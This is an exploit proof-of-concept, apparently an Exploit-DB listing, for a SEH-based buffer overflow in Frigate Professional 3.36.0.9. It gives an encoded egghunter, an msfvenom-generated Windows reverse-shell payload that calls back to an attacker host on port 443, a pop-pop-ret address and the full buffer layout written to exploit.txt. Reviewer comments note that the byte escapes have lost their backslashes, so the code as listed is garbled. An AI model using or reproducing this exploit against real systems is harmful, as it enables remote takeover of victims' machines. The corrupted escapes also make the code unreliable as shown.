


Frigate Professional 3.36.0.9 – ‘Pack File’ Buffer Overflow (SEH Egghunter)



# Exploit Title: Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-24
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.frigate3.com/
# Software Link: http://www.frigate3.com/download/frigate3_pro.exe
# Version: 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 32-bit

# Proof of Concept:

# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Frigate3.exe and go to File -> Pack
# 4. Paste the clipboard into the "Archive To" field and click on Ok button

#!/usr/bin/python
# Proof-of-concept generator for the advisory above: concatenates a set of
# string fragments into one `exploit` string and writes it to exploit.txt in
# the current working directory. The manual reproduction steps are in the
# header comments; nothing here touches the target process directly.
#
# NOTE(review): the byte escapes in this listing appear to have lost their
# backslashes during extraction (fragments read "x25x4A..." rather than
# escaped bytes). The text is reproduced here exactly as published, so as
# listed the script emits plain ASCII characters.

# First-stage fragment. The title calls this an egghunter stage; the 8-byte
# tag "T00WT00W" placed later in the layout is presumably the marker it
# searches for (usual egghunter convention — not verifiable from this listing).
egg = "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx54x58x66x05x44x17x50x5c"
egg += "x25x4Ax50x5cx25x4A"
egg += "x4Dx4Ex54x25x35x32x31x2Bx2Dx7Fx01x7Fx01x2Dx0Bx01x7Fx01x2Dx01x16x02x15x50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx01x7Fx01x01x2Dx50x0Bx14x4Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx7Fx7Fx01x01x2Dx51x29x73x04x50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx01x01x2Cx50x2Dx10x46x7Fx7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx45x7Bx26x0Cx2Dx7Fx7Fx7Fx7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx7Fx28x01x52x2Dx7Fx7Fx31x7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx72x4Dx3Dx16x2Dx7Fx70x70x7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx1Ax7Bx01x7Fx2Dx7Fx01x33x7Fx2Dx01x02x01x02x50"

# Second-stage payload, generated by the msfvenom command below (a reverse
# shell, alphanumeric-encoded). LHOST/LPORT are the author's lab values.
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "x00x0ax0dx13x14x15x16" -f py -e x86/alpha_mixed BufferRegister=EDI
buf =  ""
buf += "x57x59x49x49x49x49x49x49x49x49x49x49x49"
buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
buf += "x69x6cx68x68x6ex62x55x50x45x50x43x30x63"
buf += "x50x6ex69x6ax45x45x61x59x50x55x34x4ex6b"
buf += "x52x70x76x50x6cx4bx73x62x76x6cx6cx4bx70"
buf += "x52x42x34x6ex6bx43x42x75x78x64x4fx48x37"
buf += "x42x6ax71x36x65x61x39x6fx6ex4cx67x4cx53"
buf += "x51x71x6cx76x62x56x4cx67x50x79x51x78x4f"
buf += "x36x6dx43x31x79x57x6dx32x4cx32x72x72x66"
buf += "x37x6ex6bx72x72x56x70x6ex6bx32x6ax75x6c"
buf += "x4ex6bx62x6cx37x61x33x48x69x73x43x78x56"
buf += "x61x38x51x50x51x4ex6bx71x49x31x30x57x71"
buf += "x4bx63x6ex6bx71x59x37x68x68x63x57x4ax50"
buf += "x49x6ex6bx75x64x4ex6bx43x31x68x56x35x61"
buf += "x59x6fx6ex4cx69x51x48x4fx36x6dx55x51x6f"
buf += "x37x65x68x4bx50x70x75x69x66x73x33x51x6d"
buf += "x6ax58x35x6bx63x4dx76x44x54x35x4dx34x43"
buf += "x68x4ex6bx70x58x37x54x76x61x59x43x62x46"
buf += "x6cx4bx54x4cx72x6bx6ex6bx51x48x35x4cx35"
buf += "x51x79x43x6cx4bx43x34x6cx4bx63x31x68x50"
buf += "x6dx59x57x34x76x44x67x54x31x4bx51x4bx33"
buf += "x51x71x49x72x7ax50x51x79x6fx69x70x43x6f"
buf += "x63x6fx33x6ax6ex6bx65x42x48x6bx6cx4dx31"
buf += "x4dx50x68x45x63x55x62x73x30x75x50x30x68"
buf += "x44x37x73x43x45x62x43x6fx43x64x45x38x42"
buf += "x6cx53x47x46x46x63x37x69x6fx69x45x48x38"
buf += "x4ax30x45x51x57x70x55x50x67x59x49x54x70"
buf += "x54x32x70x42x48x44x69x6dx50x70x6bx67x70"
buf += "x79x6fx6bx65x66x30x30x50x70x50x32x70x43"
buf += "x70x72x70x67x30x62x70x75x38x58x6ax36x6f"
buf += "x49x4fx79x70x69x6fx48x55x4cx57x53x5ax56"
buf += "x65x52x48x79x50x79x38x4fx54x6dx51x52x48"
buf += "x43x32x53x30x63x31x4dx6bx6dx59x38x66x30"
buf += "x6ax66x70x43x66x53x67x61x78x5ax39x6ex45"
buf += "x72x54x33x51x59x6fx58x55x4bx35x59x50x44"
buf += "x34x66x6cx69x6fx32x6ex65x58x31x65x4ax4c"
buf += "x50x68x6ax50x68x35x39x32x73x66x49x6fx58"
buf += "x55x62x48x42x43x32x4dx73x54x57x70x6bx39"
buf += "x39x73x66x37x76x37x42x77x55x61x49x66x50"
buf += "x6ax54x52x73x69x70x56x78x62x49x6dx32x46"
buf += "x49x57x57x34x51x34x65x6cx53x31x65x51x4c"
buf += "x4dx52x64x61x34x32x30x6bx76x47x70x72x64"
buf += "x51x44x42x70x42x76x46x36x43x66x77x36x42"
buf += "x76x62x6ex32x76x71x46x70x53x46x36x33x58"
buf += "x61x69x58x4cx35x6fx6bx36x6bx4fx4bx65x4d"
buf += "x59x49x70x30x4ex31x46x33x76x6bx4fx66x50"
buf += "x71x78x43x38x4bx37x37x6dx73x50x6bx4fx4b"
buf += "x65x6fx4bx48x70x6cx75x4fx52x72x76x73x58"
buf += "x49x36x6ex75x4dx6dx4dx4dx59x6fx39x45x55"
buf += "x6cx63x36x53x4cx66x6ax4dx50x79x6bx6bx50"
buf += "x64x35x46x65x6fx4bx72x67x45x43x50x72x70"
buf += "x6fx32x4ax65x50x51x43x49x6fx59x45x41x41"

# Input layout: 4112 bytes of filler, then 4 bytes, then the address from the
# comment below written little-endian (x23 x26 x01 x40 == 0x40012623), then
# the first-stage fragment, padding up to 5000 bytes (4120 == 4112 + 4 + 4),
# the 8-byte tag, and finally the second-stage payload.
#
# Defender note: the handler address is taken from rtl60.bpl at a fixed
# 0x4000xxxx base (per the comment) — presumably that module is built
# without SafeSEH/ASLR, which is what makes an SEH overwrite of this kind
# usable; rebuilding such modules with those protections, or enforcing
# DEP/mandatory ASLR on the process, removes the reusable address. Verify
# against the actual module flags.
exploit = "A"*4112
# 0x40012623 - pop pop ret rtl60.bpl
exploit += "x74x06x75x04"
exploit += "x23x26x01x40"
exploit += egg
exploit += "C"*(5000-4120-len(egg))
exploit += "T00WT00W"
exploit += buf

# Write the assembled string in text mode, with no explicit encoding, to
# exploit.txt in the current working directory. The file handle is closed
# explicitly rather than via a `with` block.
f = open("exploit.txt", "w")
f.write(exploit)
f.close()
            








